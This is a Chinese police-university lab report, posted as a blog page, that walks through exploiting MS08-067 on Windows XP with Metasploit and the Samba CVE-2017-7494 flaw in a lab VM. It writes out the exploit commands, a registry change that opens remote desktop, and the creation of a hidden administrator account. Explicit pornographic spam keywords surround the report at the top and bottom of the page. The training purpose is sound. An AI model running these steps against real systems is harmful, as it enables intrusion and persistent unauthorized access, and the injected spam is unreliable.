<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      富利卡

      實驗五

      中國人民公安大學

      Chinese people’ public security university

       

      網絡對抗技術

      實驗報告

       

      實驗五

       

       

       

       

      學生姓名

      陳雨龍

      年級

      2015 

      區隊

      三 

      指導教師

       高見

       

       

      信息技術與網絡安全學院

      2018年11月1

       

      實驗任務總綱

      2018—2019 學年 第 1學期

      一、實驗目的

      1.通過對木馬的練習,使讀者理解和掌握木馬傳播和運行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防御木馬的相關知識,加深對木馬的安全防范意識。

       

      2.了解并熟悉常用的網絡攻擊工具,木馬的基本功能;

      3.達到鞏固課程知識和實際應用的目的。

      二、實驗要求

      1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖并對截圖進行標注和說明。

      2.文檔要求結構清晰,圖文表達準確,標注規范。推理內容客觀、合理、邏輯性強。

      3.軟件工具可使用NC、MSF等。

      4.實驗結束后,保留電子文檔。

      、實驗步驟

      1.準備

      提前做好實驗準備,實驗前應把詳細了解實驗目的、實驗要求和實驗內容,熟悉并準備好實驗用的軟件工具,按照實驗內容和要求提前做好實驗內容的準備。

      2.實驗環境

      描述實驗所使用的硬件和軟件環境(包括各種軟件工具);

      開機并啟動軟件office2003或2007、瀏覽器、加解密軟件。

      3.實驗過程

      1)啟動系統和啟動工具軟件環境。

      2)用軟件工具實現實驗內容。

      4.實驗報告

      按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文檔嵌入到實驗報告文檔中,文檔按照規定的書寫格式書寫,表格要有表說圖形要有圖說。

       

       windows ms08067 漏洞利用

        https://pan.baidu.com/s/1dbBGdkM6aDzXcKajV47zBw               靶機環境

      一.1 知識背景

       

      Metasploit是一款開源的安全漏洞檢測工具,Metasploit Framework (MSF) 在2003年以開放源碼方式發布,是可以自由獲取的開發框架。它是一個強大的開源平臺,供開發,測試和使用惡意代碼,這個環境為滲透測試、shellcode 編寫和漏洞研究提供了一個可靠平臺。這種可以擴展的模型將負載控制(payload)、編碼器(encode)、無操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成為一種研究高危漏洞的途徑。它集成了各平臺上常見的溢出漏洞和流行的 shellcode ,并且不斷更新。

       

      Metasploit Framework并不止具有exploit(溢出)收集功能,它使你專注于創建自己的溢出模塊或者二次開發。很少的一部分用匯編和C語言實現,其余均由ruby實現??傮w架構:

       

      一.2 實訓環境

       

      Windows XP SP3

       

       

      Kali Linux

       

      一.3 實訓原理

         

      漏洞名稱:Windows Server服務RPC請求緩沖區溢出漏洞(MS08-067)此安全更新解決了服務器服務中一個秘密報告的漏洞。如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用于進行蠕蟲攻擊。 防火墻最佳做法和標準的默認防火墻配置有助于保護網絡資源免受從企業外部發起的攻擊。

         

       

      一.4 漏洞利用過程

         

      在msfconsole使用search命令搜索MS08067漏洞攻擊程序

       

      從結果中得到

         

      exploit/windows/smb/ms08_067_netapi

         

      表示當前msf框架中包含MS08067漏洞的攻擊插件。

         

      使用use命令調用MS08067漏洞攻擊程序

         

      use exploit/windows/smb/ms08_067_netapi

       

      進入msf的交互式命令窗口下,使用show options 命令查看需要設置的選項。

       

      從圖中可以看到還需設置RHOST(目標地址)、Exploit target(攻擊目標)使用 set 命令設置 Module Options,此處需要設置目標IP即 set RHOST 172.16.211.129

       

      使用 set 命令設置后,可再使用show options 命令查看設置情況。從中可以看出目標IP已經設置好接著設置Exploit target,使用show targets 查看可選項可以看出以下版本的系統均存在此漏洞。因為實例演示的XP系統為WinXP SP0沒有任何補丁的中文版對應的編號為2

       

       

       

      使用set target 命令設置目標,此處即為set target 34

       

      此時再用show options 可以看到全部設置完成,接著使用exploit 或者 run 進行攻擊

       

      執行exploit命令后得到一個meterpreter命令行交互窗口

      在meterpreter中輸入run getgui -e 命令,可以打開RDP(遠程桌面)服務,端口號3389。

       

      繼續輸入shell即可進入CMD窗口

       

      在cmd命令下也可以通過添加注冊表項的方式開啟對方遠程桌面服務(如果上面已經開啟了,這步可以省略)。 

         

      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

      使用netstat -an命令查看端口是否開放,從圖中可以看到已經開放3389端口。

       

      接著使用net user命令查看XP系統中的用戶

       

      接著使用net user命令查看XP系統中的用戶

       

      在平臺中獲取shell之后,繼續在命令行添加賬戶和管理員權限。

      net user user pass /add   例如:net user gao 123 /add

       

      net localgroup administrators /add 

       

      例如:net localgroup administrators gao /add  

         

      最后開啟遠程桌面,利用剛在添加的賬戶登陸被攻擊機器。 

         

      rdesktop -a 32 -u gao -p 123 172.16.211.129:3389

       

      (二)SMB協議漏洞利用與控制CVE-2017-7494

      一.1 漏洞描述

      Samba是在Linux和UNIX系統上實現SMB協議的一個軟件。2017年5月24日Samba發布了4.6.4版本,修復了一個嚴重的遠程代碼執行漏洞,漏洞編號CVE-2017-7494,漏洞影響了Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中間的版本。攻擊者可以利用客戶端將指定庫文件上傳到具有可寫權限的共享目錄,使服務器加載并執行它。只需要一個可寫入的Samba用戶權限就可以利用該漏洞以root身份執行任意代碼。

      https://pan.baidu.com/s/1AMd3BwbNjibv0TIcJjAFMw                 靶機環境

      一.2 實訓環境

      v 靶機環境:Stapler.zip中包含虛擬機導入文件,請使用virtual-box加載啟動。環境中有CVE-2017-7494相應的漏洞。(網卡模式設置為NAT模式或Bridge【橋接】模式--和攻擊環境設置一樣的模式即可)

      v 攻擊環境:Kali-linxu,使用virtual-box啟動。(網卡模式設置為NAT模式或Bridge【橋接】模式--和靶機環境設置一樣的模式即可)

      v 實驗目的:讀取靶機環境中的/root/flags.txt文件

      v 說明:靶機環境和攻擊環境為兩臺虛擬機,啟動并保證兩臺機器互聯互通。

      一.3 實訓步驟

      一、在攻擊者機器上,使用Nmap或netdiscover工具掃描子網的機器,發現靶機的IP地址。【實驗中,大家環境不同,發現的IP地址和圖中不一定一致】

       

      二、使用Nmap工具掃描目標IP地址,發現其開放端口。

       

       

       

      三、啟動MSF搜索CVE-2017-7494相關攻擊模塊 

       

      四、加載攻擊模塊

       

      五、查看攻擊模塊中需要配置的參數

       

       

      其中RHOST代表要攻擊的目標IP地址

       

      RPORT代表攻擊目標的端口號

       

      六、設置參數,并發動攻擊

       

       

      七、獲取shell后,查看權限

       

      八、獲得命令行交互窗口

      使用python腳本獲得交互命令行窗口,腳本如下:

      python -c "import pty; pty.spawn('/bin/bash')"

       

      九、查看flag文件

       

       

       

      posted on 2018-10-24 08:30  富利卡  閱讀(136)  評論(0)    收藏  舉報

      主站蜘蛛池模板: 亚洲精品无码在线观看| 欧美裸体xxxx极品| 不卡乱辈伦在线看中文字幕| 玖玖在线精品免费视频| 亚洲AV熟妇在线观看| 一本久道中文无码字幕av| 日韩精品区一区二区三vr| 18禁黄网站禁片免费观看| 日韩av无码中文无码电影| 欧美人与动牲交a免费| 国产欧美精品一区二区三区四区| 国产精品国语对白一区二区| 国产成人啪精品午夜网站| 少妇被粗大的猛烈xx动态图| 欧美人人妻人人澡人人尤物| 亚洲中文字幕无码一区无广告 | 国产精品久久久久7777| AV最新高清无码专区| 苍井空一区二区三区在线观看| 中文字幕无码中文字幕有码a| 亚洲中文字幕国产精品| 国产v亚洲v天堂a无码| 欧美日韩v| 亚洲一区二区av在线| yy111111在线尤物| 国产免费一区二区三区在线观看| 色偷一区国产精品| 蜜臀av一区二区三区日韩| 我国产码在线观看av哈哈哈网站 | 国产成人高清亚洲综合| 国产一区二区三区免费观看| 国产高清亚洲一区亚洲二区| 国产精品青青在线观看爽香蕉| 丰满无码人妻热妇无码区| 999国产精品一区二区| 久久人体视频| 在线观看精品日本一区二| 人妻av无码系列一区二区三区| 恩平市| 日韩精品亚洲精品第一页| 成年女人免费碰碰视频|